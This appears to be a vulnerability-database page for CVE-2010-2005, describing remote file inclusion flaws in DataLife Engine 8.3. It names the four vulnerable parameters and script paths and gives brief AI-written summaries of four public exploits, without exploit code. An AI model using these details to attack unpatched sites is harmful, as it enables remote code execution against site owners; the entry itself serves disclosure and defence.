CVE-2010-2005
DataLife Engine 8.3 - Remote Code Execution via PHP File Inclusion
Title source: llmExploitation Summary
EIP tracks 4 public exploits for CVE-2010-2005. PoCs published by indoushka.
AI-analyzed exploit summary This exploit demonstrates a remote file inclusion vulnerability in Datalife Engine 8.3 by manipulating the 'selected_language' parameter in init.php to include arbitrary remote files. The attack leverages insufficient input sanitization to execute remote code.
Description
Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8.3 allow remote attackers to execute arbitrary PHP code via a URL in (1) the selected_language parameter to engine/inc/include/init.php, (2) the config[langs] parameter to engine/inc/help.php, (3) the config[lang] parameter to engine/ajax/pm.php, (4) and the _REQUEST[skin] parameter to engine/ajax/addcomments.php.
Exploits (4)
This exploit demonstrates a remote file inclusion vulnerability in Datalife Engine 8.3 by manipulating the 'selected_language' parameter in init.php to include arbitrary remote files. The attack leverages insufficient input sanitization to execute remote code.
The code describes a remote file inclusion vulnerability in Datalife Engine 8.3 due to insufficient sanitization of user-supplied data in the 'config[langs]' parameter. Exploitation could allow arbitrary file inclusion and potential remote code execution.
This exploit demonstrates a remote file inclusion vulnerability in Datalife Engine 8.3 by injecting a malicious URL into the 'config[lang_' parameter. The lack of input sanitization allows an attacker to include arbitrary remote files, potentially leading to remote code execution.
This exploit demonstrates a remote file inclusion vulnerability in Datalife Engine 8.3 by manipulating the `_REQUEST[skin]` parameter to include arbitrary remote files. The vulnerability arises from insufficient sanitization of user-supplied input.